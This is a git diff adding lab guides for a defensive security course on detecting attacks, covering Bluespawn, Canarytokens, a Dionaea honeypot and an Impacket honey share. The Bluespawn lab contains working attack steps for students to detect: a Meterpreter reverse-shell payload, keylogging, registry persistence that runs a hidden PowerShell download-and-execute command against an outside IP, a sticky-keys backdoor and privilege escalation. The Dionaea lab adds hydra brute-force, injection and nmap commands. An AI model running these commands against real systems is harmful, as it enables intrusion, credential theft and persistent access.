+```bash
+
+msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=[Your Linux IP Address] lport=4444 -f exe > /tmp/TrustMe.exe
+```
+
+
+
+<img width="1096" height="136" alt="2026-03-26_10-33" src="https://github.com/user-attachments/assets/cedde4be-e44e-4bab-87bb-5a683603e50f" />
+
+
+
+
+Now let's start the **Metasploit** Handler
+
+```bash
+msfconsole -q
+```
+
+We are going to run the following commands to correctly set the parameters:
+
+```bash
+use exploit/multi/handler
+```
+
+```bash
+set PAYLOAD windows/meterpreter/reverse_tcp
+```
+
+```bash
+set LHOST [Your Linux IP Address]
+```
+
+Remember, **Your IP will be different!**
+
+```bash
+exploit
+```
+
+It should look like this:
+
+<img width="687" height="206" alt="2026-02-23_15-38" src="https://github.com/user-attachments/assets/71226123-2163-4237-8173-c7586de81ee7" />
+
+
+
+
+Open up a **Powershell** terminal, copy the file over from **Linux**
+
+```ps
+cd .\Desktop\
+```
+
+```ps
+scp ubuntu@linux.cloudlab.lan:/tmp/TrustMe.exe .
+```
+
+Open a **Command Prompt**
+
+<img width="74" height="91" alt="Screenshot From 2026-02-07 17-59-56" src="https://github.com/user-attachments/assets/62be252d-35ca-41a4-8ade-ba5d8a8478bb" />
+
+
+Let's run the following commands to run the **"TrustMe.exe"** file.
+
+```cmd
+cd \Users\Administrator\Desktop
+```
+ 
+Then run it with the following:
+
+```cmd
+TrustMe.exe
+```
+
+Back at your Ubuntu terminal, you should have a metasploit session!
+
+<img width="987" height="392" alt="2026-03-26_10-44" src="https://github.com/user-attachments/assets/152dd3e7-11d7-43d8-85f6-45d0870cc725" />
+
+Now, let’s look at keystroke logging.
+
+To learn more about this check out MITRE:
+
+https://attack.mitre.org/techniques/T1056/
+
+Also, below is a list of just some of the threat groups that use this technique:
+
+<img width="1072" height="723" alt="image" src="https://github.com/user-attachments/assets/c005128b-124b-4bcc-9bf7-8516ca4be2d6" />
+
+
+Run commands
+
+meterpreter > `keyscan_start`
+
+Go and type something on your Windows system.
+
+meterpreter > `keyscan_dump`
+
+![](attachments/Clipboard_2020-06-15-13-52-00.png)
+
+
+Go and check Bluespawn.  Did it detect it?
+
+Now, let’s play with registry persistence.
+
+To learn more about this check out MITRE:
+
+https://attack.mitre.org/techniques/T1547/
+
+Here are just some of the groups that use this technique:
+
+<img width="1072" height="533" alt="image" src="https://github.com/user-attachments/assets/86040c18-29cd-4d16-95dd-84e45dcb1f63" />
+
+
+meterpreter > `shell`
+
+C:\> `reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Payload /d "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://172.20.243.5:80/a'))\"" /f`
+
+C:\>  `reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "c:\windows\system32\cmd.exe"`
+
+![](attachments/Clipboard_2020-06-15-14-00-53.png)
+
+Go and check Bluespawn.  Did it detect it?
+
+Next, let’s play with privilege escalation.
+
+Here is al link to more info about this from MITRE:
+
+https://attack.mitre.org/techniques/T1543/
+
+Here are just some of the groups that use this technique:
+
+<img width="1087" height="489" alt="image" src="https://github.com/user-attachments/assets/41b91eb5-8505-48a3-bee0-09cbb87f9dca" />
+
+
+meterpreter >`getsystem`
+
+![](attachments/Clipboard_2020-06-15-13-52-28.png)
+
+
+![](attachments/Clipboard_2020-06-15-13-56-34.png)
+
+Go and check Bluespawn.  Did it detect it?
+
+***                                                                 
+
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/deepbluecliIntroClass/DeepBlueCLI.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/AppLocker/AppLocker.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
+
+
+
+
+
+
+
+
+
+
+
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawn/Clipboard_2020-06-12-10-36-44.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/Clipboard_2020-06-12-10-36-44.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/bluespawn/Clipboard_2020-06-12-10-36-44.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/Clipboard_2020-06-12-10-36-44.png
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-12-10-36-44.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-12-10-36-44.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-12-10-36-44.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-12-10-36-44.png
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-15-13-52-00.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-15-13-52-00.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-15-13-52-00.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-15-13-52-00.png
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-15-13-52-28.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-15-13-52-28.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-15-13-52-28.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-15-13-52-28.png
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-15-13-56-34.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-15-13-56-34.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-15-13-56-34.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-15-13-56-34.png
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-15-14-00-53.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-15-14-00-53.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-15-14-00-53.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-15-14-00-53.png
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-16-09-46-00 - Copy.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-16-09-46-00 - Copy.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-16-09-46-00 - Copy.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-16-09-46-00 - Copy.png
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-16-09-46-00.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-16-09-46-00.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-16-09-46-00.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-16-09-46-00.png
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-16-09-47-26.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-16-09-47-26.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-16-09-47-26.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-16-09-47-26.png
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-16-09-48-18.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-16-09-48-18.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-16-09-48-18.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-16-09-48-18.png
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-16-09-52-22.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-16-09-52-22.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-16-09-52-22.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-16-09-52-22.png
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-16-09-53-18.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-16-09-53-18.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-16-09-53-18.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-16-09-53-18.png
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-16-09-55-12.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-16-09-55-12.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-16-09-55-12.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-16-09-55-12.png
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-23-13-36-10.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-23-13-36-10.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/bluespawn/attachments/Clipboard_2020-06-23-13-36-10.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/Clipboard_2020-06-23-13-36-10.png
diff --git a/IntroClassFiles/Tools/IntroClass/md/images/OpeningPowershell.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/OpeningPowershell.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/md/images/OpeningPowershell.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/OpeningPowershell.png
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/bluespawndetections.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/bluespawndetections.png
new file mode 100644
index 00000000..b3f0a4ee
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/bluespawndetections.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/bluspawnlaunched.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/bluspawnlaunched.png
new file mode 100644
index 00000000..47e8fa41
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/bluspawnlaunched.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/cdandstartbluespawn.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/cdandstartbluespawn.png
new file mode 100644
index 00000000..87be1d62
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/cdandstartbluespawn.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/crossreference.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/crossreference.png
new file mode 100644
index 00000000..e1bfa310
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/crossreference.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/bluespawn/attachments/desktop.ini b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/desktop.ini
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/bluespawn/attachments/desktop.ini
rename to IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/desktop.ini
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/disableDefender.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/disableDefender.png
new file mode 100644
index 00000000..cccd1e66
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/disableDefender.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/installationconfirmation.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/installationconfirmation.png
new file mode 100644
index 00000000..6d184e40
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/installationconfirmation.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/invokeatomicv1.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/invokeatomicv1.png
new file mode 100644
index 00000000..fb45da9d
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/invokeatomicv1.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/openingcommandprompt.png b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/openingcommandprompt.png
new file mode 100644
index 00000000..4a0f6711
Binary files /dev/null and b/IntroClassFiles/Tools/IntroClass/ADHD/bluespawn/attachments/openingcommandprompt.png differ
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/Canarytokens.md b/IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/Canarytokens.md
new file mode 100644
index 00000000..88846179
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/Canarytokens.md
@@ -0,0 +1,131 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+ 
+
+# Canarytokens 
+
+# Any VM
+
+First, we will need to navigate to the canarytokens server from a system with Microsoft Word on it: 
+
+https://www.canarytokens.org/generate#
+
+Search for ```Microsoft Word```
+
+<img width="1034" height="608" alt="canarytokens_site" src="https://github.com/user-attachments/assets/6601eba1-4dab-4b56-a5d6-7284ac54981b" />
+
+   
+Now, let's create a token Word Document: 
+
+<img width="638" height="430" alt="word_token" src="https://github.com/user-attachments/assets/145c6b7c-4aa2-4a36-8d39-3d431962196d" />
+  
+
+Then select Create Token. 
+
+  
+
+When you get the next screen, select Download your MS Word File.  
+
+  
+
+Then, download it and open it. 
+
+<img width="640" height="514" alt="MS_word_token" src="https://github.com/user-attachments/assets/cd3f4c7f-ea4a-42ce-8d2f-48a03cca0480" />
+
+
+Notice that it is just an empty Word document. You can add whatever you want in it. 
+
+  
+
+Now, check your email. 
+
+  
+
+You should have gotten an alert: 
+
+<img width="612" height="1161" alt="ms_token_triggered" src="https://github.com/user-attachments/assets/20591922-35bc-4daa-9c15-cd9b73b6a4e8" />
+
+
+Now, let's play with the site cloner: 
+
+
+Search for ```JS cloned website```
+
+<img width="140" height="144" alt="web_clone" src="https://github.com/user-attachments/assets/966e4f1d-9e09-4f98-912f-32c5fbed5f89" />
+  
+
+Next, fill in the appropriate fields: 
+
+<img width="606" height="500" alt="web_clone_fields" src="https://github.com/user-attachments/assets/e85a0e4c-7d41-4c95-bb1d-07f2f730897f" />
+
+
+Now, select Create my Canarytoken. 
+
+  
+
+Now we will need to copy the JavaScript and put it somewhere so it triggers: 
+
+<img width="572" height="604" alt="web_generated_token" src="https://github.com/user-attachments/assets/cadba2ee-abce-4ee7-8a74-6092c6f80034" />
+
+
+Now, let's test out the JavaScript Canary token. Open a Linux terminal and execute the following command:
+
+```bash
+cd ~/ADCD/canaryToken
+```
+
+In this directory, we have a HTML file called ```index.html```. In this file, we will write the generated JavaScript token.
+
+Open the HTML file with a text editor and at the very bottom of the file inside the ```<script> </script>``` tags write the generated JavaScript token.
+
+Then, save it and close it.
+
+Now we have a page that has the role of a cloned site. In order to test the functionality of the canary token through this page, we must add a domain to the ```/etc/hosts```.
+
+>[!IMPORTANT]
+>
+>The domain we will add must be completely different from the domain we gave at the token creation!!
+>(e.g. If we gave ```yourorg.com``` as a domain at the token creation, we must give a completely different domain at the new /etc/hosts record like ```clonedsite.com```)
+
+For this purpose, execute the following:
+
+```bash
+echo "127.0.0.1 clonedsite.com" | sudo tee -a /etc/hosts
+```
+
+<img width="743" height="284" alt="echo_domain" src="https://github.com/user-attachments/assets/9c5c4bf2-42f5-4412-a1ee-b20cdd67e84a" />
+
+
+Now everything is ready. Time for action!
+
+First things first, we must run a server in order to be able to access our page.
+
+```bash
+sudo python3 -m http.server 80
+```
+
+Then open a browser and access the domain you just added in the ```/etc/hosts```. In our case:
+```
+http://clonedsite.com
+```
+
+<img width="1276" height="558" alt="test_page" src="https://github.com/user-attachments/assets/0cdf5e00-db1f-4e8b-9a54-9742c7a366d8" />
+
+
+In a few moments you should get an email alert: 
+
+<img width="565" height="1207" alt="web_token_triggered" src="https://github.com/user-attachments/assets/b48928af-8ad7-4da9-a137-1f0f7bab9060" />
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/GoPhish.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/FakeNet-NG.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
diff --git a/IntroClassFiles/Tools/IntroClass/canarytokens/attachment/Clipboard_2021-03-12-09-59-43.png b/IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/attachment/Clipboard_2021-03-12-09-59-43.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/canarytokens/attachment/Clipboard_2021-03-12-09-59-43.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/attachment/Clipboard_2021-03-12-09-59-43.png
diff --git a/IntroClassFiles/Tools/IntroClass/canarytokens/attachment/Clipboard_2021-03-12-10-01-33.png b/IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/attachment/Clipboard_2021-03-12-10-01-33.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/canarytokens/attachment/Clipboard_2021-03-12-10-01-33.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/attachment/Clipboard_2021-03-12-10-01-33.png
diff --git a/IntroClassFiles/Tools/IntroClass/canarytokens/attachment/Clipboard_2021-03-12-10-03-10.png b/IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/attachment/Clipboard_2021-03-12-10-03-10.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/canarytokens/attachment/Clipboard_2021-03-12-10-03-10.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/attachment/Clipboard_2021-03-12-10-03-10.png
diff --git a/IntroClassFiles/Tools/IntroClass/canarytokens/attachment/Clipboard_2021-03-12-10-04-16.png b/IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/attachment/Clipboard_2021-03-12-10-04-16.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/canarytokens/attachment/Clipboard_2021-03-12-10-04-16.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/attachment/Clipboard_2021-03-12-10-04-16.png
diff --git a/IntroClassFiles/Tools/IntroClass/canarytokens/attachment/Clipboard_2021-03-12-10-07-48.png b/IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/attachment/Clipboard_2021-03-12-10-07-48.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/canarytokens/attachment/Clipboard_2021-03-12-10-07-48.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/attachment/Clipboard_2021-03-12-10-07-48.png
diff --git a/IntroClassFiles/Tools/IntroClass/canarytokens/attachment/Clipboard_2021-03-12-10-08-21.png b/IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/attachment/Clipboard_2021-03-12-10-08-21.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/canarytokens/attachment/Clipboard_2021-03-12-10-08-21.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/attachment/Clipboard_2021-03-12-10-08-21.png
diff --git a/IntroClassFiles/Tools/IntroClass/canarytokens/attachment/Clipboard_2021-03-12-10-09-19.png b/IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/attachment/Clipboard_2021-03-12-10-09-19.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/canarytokens/attachment/Clipboard_2021-03-12-10-09-19.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/attachment/Clipboard_2021-03-12-10-09-19.png
diff --git a/IntroClassFiles/Tools/IntroClass/canarytokens/attachment/Clipboard_2021-03-12-10-11-06.png b/IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/attachment/Clipboard_2021-03-12-10-11-06.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/canarytokens/attachment/Clipboard_2021-03-12-10-11-06.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/attachment/Clipboard_2021-03-12-10-11-06.png
diff --git a/IntroClassFiles/Tools/IntroClass/canarytokens/attachment/Clipboard_2021-03-12-10-18-39.png b/IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/attachment/Clipboard_2021-03-12-10-18-39.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/canarytokens/attachment/Clipboard_2021-03-12-10-18-39.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/attachment/Clipboard_2021-03-12-10-18-39.png
diff --git a/IntroClassFiles/Tools/IntroClass/canarytokens/attachment/Clipboard_2021-03-12-10-19-36.png b/IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/attachment/Clipboard_2021-03-12-10-19-36.png
similarity index 100%
rename from IntroClassFiles/Tools/IntroClass/canarytokens/attachment/Clipboard_2021-03-12-10-19-36.png
rename to IntroClassFiles/Tools/IntroClass/ADHD/canarytokens/attachment/Clipboard_2021-03-12-10-19-36.png
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/dionaea.md b/IntroClassFiles/Tools/IntroClass/ADHD/dionaea.md
new file mode 100644
index 00000000..b3e726cf
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/dionaea.md
@@ -0,0 +1,127 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+
+# Dionaea
+
+# Ubuntu VM
+
+### In this lab we will
+- Observe how it captures malicious connection attempts
+- View logs and captured malware samples
+- Understand its modular architecture
+
+# Let's start
+
+- Open up a terminal if you are not using **SSH**
+
+- Go the Dionaea's directory
+
+```bash
+cd ~/SOC_Analyst_Labs/dionaea/
+```
+
+ - Start it up:
+```bash
+sudo dionaea
+```
+
+<img width="1506" height="491" alt="2026-03-18_11-37" src="https://github.com/user-attachments/assets/4cf4bb02-0c36-4bc8-b475-a10f07146c96" />
+
+
+<br>
+
+Open another terminal!
+
+Let's see it's true power, see what ports it is listening on:
+```bash
+sudo netstat -tulnp | grep dionaea
+```
+
+<img width="941" height="729" alt="2026-03-18_11-39" src="https://github.com/user-attachments/assets/17a98b45-21f5-42ad-8c45-5e97e6f369aa" />
+
+
+We can see it's listening on lots of ports (FTP, HTTP, SMB, MONGO, MSSQL, SIP, and more)
+
+Let's simulate and FTP bruteforce attack
+
+- On another terminal tail the logs:
+```bash
+sudo tail -f /usr/local/var/log/dionaea/dionaea.log
+```
+
+>[!NOTE]
+>We have rockyou.txt on **~/Desktop**
+
+- Then on a **third** terminal
+
+
+
+```bash
+hydra -l admin -P ~/Desktop/rockyou.txt localhost ftp -V
+```
+We can see all perspectives, the one of the attacker, it is saying that it found passwords, despite it being false to simulate a vulnerable service
+
+<img width="1149" height="908" alt="2026-03-18_11-50" src="https://github.com/user-attachments/assets/fce67025-4cad-425c-aac1-6731b189cbd1" />
+
+
+<br><br>
+
+And the one of the Analyst, where we see the logs and the credentials used
+
+<img width="1849" height="1011" alt="2026-03-18_11-51" src="https://github.com/user-attachments/assets/3fc7afde-6673-4053-9831-d4d1988ad233" />
+
+
+<br><br>
+
+Now let's try with mysql instead of ftp:
+
+```bash
+hydra -l root -P ~/Desktop/rockyou.txt localhost mysql
+``` 
+- Same fake success
+
+<img width="1137" height="312" alt="2026-03-18_11-52" src="https://github.com/user-attachments/assets/3e2d339c-3c49-4622-986a-35a194ebcdf1" />
+
+
+<br><br>
+
+
+What about **Command Injection**?
+```bash
+curl "http://localhost/index.php?cmd=ls"
+```
+
+For each of those commands try to understand the logs
+
+Let's try an agressive port scan using **nmap**
+```bash
+nmap -A localhost
+```
+
+## Final thoughts
+Dionaea’s true power comes from its purpose-built design as an intelligent malware-catching honeypot — not just a passive listener, but a smart, low-interaction trap
+
+Most important features
+- Smart Protocol Emulation
+- Binary Capture Engine
+- Integrated SQLite Logging
+- Wide Protocol Coverage
+- Python + C Plugin Architecture
+- Visual and Analytical Integration
+
+
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/CuckooSandbox.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/Haraka.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
+
diff --git a/IntroClassFiles/Tools/IntroClass/ADHD/honeyshare/HoneyShare.md b/IntroClassFiles/Tools/IntroClass/ADHD/honeyshare/HoneyShare.md
new file mode 100644
index 00000000..85d13fc1
--- /dev/null
+++ b/IntroClassFiles/Tools/IntroClass/ADHD/honeyshare/HoneyShare.md
@@ -0,0 +1,110 @@
+![image](https://github.com/user-attachments/assets/068fae26-6e8f-402f-ad69-63a4e6a1f59e)
+ 
+
+# Honey Share 
+
+# Windows VM
+
+In this lab we will be creating and triggering a honey share.  The goal of this lab is to show how to set up a simple Impacket SMB server that can record attempted connections to it. 
+
+This can be used for detecting lateral movement in a Windows environment.  
+
+One of the cool things about this is it will track the compromised user, the system and the password hash of the compromised user account. 
+
+Let's get started. 
+
+First, we will need to open a **Linux Terminal**: 
+
+
+- Open **Ubuntu Shell**
+
+<img width="90" height="104" alt="Screenshot From 2026-02-23 10-28-37" src="https://github.com/user-attachments/assets/ae6d408b-7622-4545-b849-aef3d8fa0cb4" />
+
+
+
+Next, we will navigate to the **Impacket** directory: 
+
+```bash
+cd ~/ADCD/impacket
+```
+
+```bash
+source venv/bin/activate
+```
+
+- Then navigate to the **examples** directory:
+
+```bash
+cd ./examples
+```
+
+<img width="742" height="75" alt="cd_venv" src="https://github.com/user-attachments/assets/6e41042c-9a51-4f18-b09a-5ca534101e5a" />
+
+
+- Make sure you are in the right place
+
+```bash
+ls
+```
+
+It should look like this:
+
+<img width="1238" height="338" alt="ls_impacket" src="https://github.com/user-attachments/assets/095399cd-7fe5-42e0-a547-fa673aa1616b" />
+
+
+Now, let's start the SMB server: 
+
+```bash
+sudo ~/ADCD/impacket/venv/bin/python smbserver.py -debug -smb2support -comment 'secret' SECRET /secret
+```
+
+It should look like this: 
+
+<img width="1806" height="327" alt="impacket_server" src="https://github.com/user-attachments/assets/eed970c8-7ccc-4e09-bec9-056317d8f292" />
+
+
+Next, let's open a Windows Command Prompt: 
+
+![image](https://github.com/user-attachments/assets/0ccc949d-32c3-4d7b-bb18-1bb39ee36dfc)
+
+Then, attempt to mount the share from your Windows system: 
+
+- Make sure to use the **Linux IP** from **tailscale**
+
+```bash
+net use * \\10.10.115.101\secret
+```
+
+>[!IMPORTANT]
+>
+>Your IP address may be different!!! 
+  
+
+We did the most basic level of attempted authentication to the share, and it generated an error.  
+
+<img width="1365" height="412" alt="admin_error" src="https://github.com/user-attachments/assets/e80960fb-3044-42b0-999b-34b2d0c9568a" />
+
+
+However, the trap was triggered! 
+
+Go back to your **Linux terminal** and see the log data. 
+
+It should look like this: 
+
+<img width="1375" height="752" alt="logs" src="https://github.com/user-attachments/assets/071e0e2c-c261-41c6-9066-3b49510a0c15" />
+
+
+***                                                                 
+<b><i>Continuing the course? </br>[Next Lab](/IntroClassFiles/Tools/IntroClass/ADHD/honeyuser/honeyuser.md)</i></b>
+
+<b><i>Want to go back? </br>[Previous Lab](/IntroClassFiles/Tools/IntroClass/ADHD/HoneyBadger_files/HoneyBadger.md)</i></b>
+
+<b><i>Looking for a different lab? </br>[Lab Directory](/IntroClassFiles/navigation.md)</i></b>
+
+***Finished with the Labs?***
+
+Please be sure to destroy the lab environment!
+
+[Click here for instructions on how to destroy the Lab Environment](/IntroClassFiles/Tools/IntroClass/LabDestruction/labdestruction.md)
+
+---
